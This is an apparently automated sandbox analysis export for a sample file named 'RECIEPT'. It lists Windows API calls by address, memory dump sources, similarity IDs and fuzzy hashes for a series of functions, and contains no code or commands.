                                        • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                        • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                        • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                        APIs
                                        • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                        • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                        • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                        • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                        • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                        APIs
                                        • SendMessageW.USER32 ref: 004555C7
                                        • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                        • DeleteObject.GDI32(?), ref: 00455736
                                        • DeleteObject.GDI32(?), ref: 00455744
                                        • DestroyIcon.USER32(?), ref: 00455752
                                        • DestroyWindow.USER32(?), ref: 00455760
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                        • String ID:
                                        • API String ID: 3691411573-0
                                        • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                        • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                        • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                        • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                        APIs
                                          • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                          • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                          • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                          • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                        • LineTo.GDI32(?,?,?), ref: 004472AC
                                        • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                        • LineTo.GDI32(?,?,?), ref: 004472C6
                                        • EndPath.GDI32(?), ref: 004472D6
                                        • StrokePath.GDI32(?), ref: 004472E4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                        • String ID:
                                        • API String ID: 372113273-0
                                        • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                        • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                        • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                        • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                        APIs
                                        • GetDC.USER32(00000000), ref: 0044CC6D
                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                        • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CapsDevice$Release
                                        • String ID:
                                        • API String ID: 1035833867-0
                                        • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                        • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                        • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                        • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                        APIs
                                        • __getptd.LIBCMT ref: 0041708E
                                          • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                          • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                        • __amsg_exit.LIBCMT ref: 004170AE
                                        • __lock.LIBCMT ref: 004170BE
                                        • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                        • _free.LIBCMT ref: 004170EE
                                        • InterlockedIncrement.KERNEL32(02E22CE0), ref: 00417106
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                        • String ID:
                                        • API String ID: 3470314060-0
                                        • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                        • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                        • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                        • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                        APIs
                                        • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                        • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                        • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                          • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                        • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                        • String ID:
                                        • API String ID: 3495660284-0
                                        • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                        • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                        • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                        • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                        APIs
                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Virtual
                                        • String ID:
                                        • API String ID: 4278518827-0
                                        • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                        • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                        • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                        • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                        APIs
                                        • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                          • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                          • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                        • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                          • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                        • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                        • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                        • ExitThread.KERNEL32 ref: 004151ED
                                        • __freefls@4.LIBCMT ref: 00415209
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                        • String ID:
                                        • API String ID: 442100245-0
                                        • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                        • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                                        • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                                        • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                                        APIs
                                          • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                          • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                        • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                                        • _wcslen.LIBCMT ref: 0045F94A
                                        • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                        • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                                        • String ID: 0
                                        • API String ID: 621800784-4108050209
                                        • Opcode ID: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                        • Instruction ID: 8916cda2fcff4f3da81aa675480f1736598f59ba0f795e6899437ff2d0190f01
                                        • Opcode Fuzzy Hash: ba56779765e6f71d67f6246429d0af9e67b9def047912433c0c15b7e926c8fa5
                                        • Instruction Fuzzy Hash: E061EDB1604301AAD710EF69D885B6B77A4AF99315F04493FF98087292E7BCD84CC79B
                                        APIs
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • SetErrorMode.KERNEL32 ref: 004781CE
                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                        • SetErrorMode.KERNEL32(?), ref: 00478270
                                        • SetErrorMode.KERNEL32(?), ref: 00478340
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                        • String ID: \VH
                                        • API String ID: 3884216118-234962358
                                        • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                        • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                        • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                        • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                        APIs
                                        • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                        • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                        • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadProc
                                        • String ID: AU3_GetPluginDetails$v
                                        • API String ID: 145871493-264927652
                                        • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                        • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                        • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                        • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                        • IsMenu.USER32(?), ref: 0044854D
                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                        • DrawMenuBar.USER32 ref: 004485AF
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Menu$Item$DrawInfoInsert
                                        • String ID: 0
                                        • API String ID: 3076010158-4108050209
                                        • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                        • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                        • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                        • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                        APIs
                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                        • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: MessageSend$_memmove_wcslen
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 1589278365-1403004172
                                        • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                        • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                        • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                        • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2400226991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2400210494.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400273825.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400292941.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400310208.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400327002.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2400364041.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_RECIEPT.jbxd
                                        Similarity
                                        • API ID: Handle
                                        • String ID: nul
                                        • API String ID: 2519475695-2873401336
                                        • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                        • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                        • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                        • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                        APIs
                                        • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                        Strings
